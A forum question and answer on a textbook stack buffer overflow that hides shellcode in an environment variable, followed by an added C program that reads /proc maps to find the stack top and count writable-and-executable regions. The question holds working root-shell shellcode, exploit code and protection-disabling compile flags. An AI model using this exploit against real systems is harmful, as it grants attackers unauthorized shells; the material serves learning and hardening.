Buffer overflow using environment variables


Question

I'm trying this code inspired by the "Hacking: The Art of Exploitation" book. It involves exploiting a buffer overflow using the environment variable. The exploitation code is:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd"
"\x80";

int main(int argc, char *argv[]) {
  char *env[2] = {shellcode, 0};
  unsigned int i, ret;

  char *buffer = (char *)malloc(160);

  ret = 0xbffffffa - sizeof(shellcode) - strlen("./auth_overflow");

  for (i = 0; i < 160; i += 4)
    *((unsigned int *)(buffer + i)) = ret;

  execle("./auth_overflow", "auth_overflow", buffer, (char *)NULL, env);
  free(buffer);
}

The problem is the base address 0xbffffffa. I read here that the reason for this address is because "the Linux kernel is implemented like so". Still the exploit is not working and resulting in a segmentation fault.

I'm running Ubuntu 14.04 with Kernel version 3.13.0-83-generic on a 64-bit machine and I'm compiling the exploitation code using the following command:

gcc -m32 -fno-stack-protector -z execstack -g exploit.c -o exploit

I have also disabled ASLR.

Any ideas on how to determine this base address?

Thanks for your help.

Recommended answer

The idea with such exploitation is to use a nop sled before your actual shellcode. That way, even if your address approximation is bad, there's more chance to hit a nop, until your shellcode gets executed.

To get that address, you can cheat (for a start) looking at memory mappings in /proc/<pid>/maps.
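The answer's suggestion to read /proc/<pid>/maps is the right way to check the assumption the question hardcodes: 0xbffffffa is only a guess about where the stack ends, and on a different kernel or a 64-bit machine the [stack] line will show something else. The program below is an added example, not code from the question, the answer, or the book; it parses the maps format (which is stable across Linux versions), reports the top of the [stack] region, and counts mappings that are both writable and executable, which is the condition `-z execstack` creates and which a hardened build should not show. The function names and the embedded sample mapping are constructed for this example; the sample is not captured from a real system, and when run stand-alone the program reads /proc/self/maps instead.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* One parsed line of /proc/<pid>/maps. */
struct mapping {
    unsigned long start;   /* first address of the region */
    unsigned long end;     /* one past the last address */
    char perms[5];         /* e.g. "rwxp" */
    char path[256];        /* backing file or pseudo-name such as [stack]; may be empty */
};

/* Parse one maps line such as
 *   "bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]"
 * Returns 1 if the line is a mapping, 0 otherwise. A path containing
 * spaces is cut at the first space, which is enough for these checks. */
int parse_maps_line(const char *line, struct mapping *m)
{
    unsigned long offset, inode;
    char dev[16];
    int n;

    m->path[0] = '\0';
    n = sscanf(line, "%lx-%lx %4s %lx %15s %lu %255s",
               &m->start, &m->end, m->perms, &offset, dev, &inode, m->path);
    return n >= 6;
}

/* Copy the next '\n'-terminated line from *cursor into buf; returns 0 at end of text. */
static int next_line(const char **cursor, char *buf, size_t buflen)
{
    const char *p = *cursor;
    const char *nl;
    size_t len;

    if (p == NULL || *p == '\0')
        return 0;
    nl = strchr(p, '\n');
    len = nl ? (size_t)(nl - p) : strlen(p);
    if (len >= buflen)
        len = buflen - 1;
    memcpy(buf, p, len);
    buf[len] = '\0';
    *cursor = nl ? nl + 1 : p + strlen(p);
    return 1;
}

/* Address one past the top of the [stack] region, or 0 if none is listed.
 * This is the value a hardcoded guess like 0xbffffffa silently assumes. */
unsigned long stack_top(const char *maps_text)
{
    const char *cur = maps_text;
    char line[512];
    struct mapping m;

    while (next_line(&cur, line, sizeof line))
        if (parse_maps_line(line, &m) && strcmp(m.path, "[stack]") == 0)
            return m.end;
    return 0;
}

/* Number of regions that are both writable and executable. A binary linked
 * with -z execstack shows its stack as rwxp; a hardened build should give 0. */
int count_wx_mappings(const char *maps_text)
{
    const char *cur = maps_text;
    char line[512];
    struct mapping m;
    int count = 0;

    while (next_line(&cur, line, sizeof line))
        if (parse_maps_line(line, &m) && m.perms[1] == 'w' && m.perms[2] == 'x')
            count++;
    return count;
}

/* Constructed sample, not captured from a real system: a 32-bit process with
 * an executable stack, laid out the way the hardcoded 0xbffffffa assumes. */
const char sample_maps[] =
    "08048000-08049000 r-xp 00000000 08:01 131092     /tmp/auth_overflow\n"
    "08049000-0804a000 rw-p 00001000 08:01 131092     /tmp/auth_overflow\n"
    "0804a000-0806b000 rw-p 00000000 00:00 0          [heap]\n"
    "b7e00000-b7fc0000 r-xp 00000000 08:01 4000       /lib32/libc.so.6\n"
    "b7fc0000-b7fc2000 rw-p 001c0000 08:01 4000       /lib32/libc.so.6\n"
    "bffdf000-c0000000 rwxp 00000000 00:00 0          [stack]\n";

/* Stand-alone use: report on the running process itself. */
int main(void)
{
    static char buf[1 << 16];
    FILE *f = fopen("/proc/self/maps", "r");
    size_t n;

    if (f == NULL) {
        perror("/proc/self/maps");
        return 1;
    }
    n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    printf("stack top:    0x%lx\n", stack_top(buf));
    printf("W+X mappings: %d\n", count_wx_mappings(buf));
    return 0;
}
```

Compile it with `-m32` to inspect a 32-bit process image on the 64-bit machine, or without it for a native one; with ASLR enabled, running it twice prints two different stack tops, which is exactly why a fixed address in the exploit code is fragile. On the constructed sample the stack top is 0xc0000000 and one W+X region (the stack) is reported.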
